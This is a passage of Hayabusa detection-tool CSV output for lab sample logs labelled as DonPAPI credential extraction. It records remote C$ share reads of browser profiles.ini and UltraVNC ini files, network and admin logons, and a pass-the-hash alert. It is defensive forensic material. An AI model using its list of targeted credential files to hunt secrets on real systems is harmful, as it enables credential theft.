Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.111 
+09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 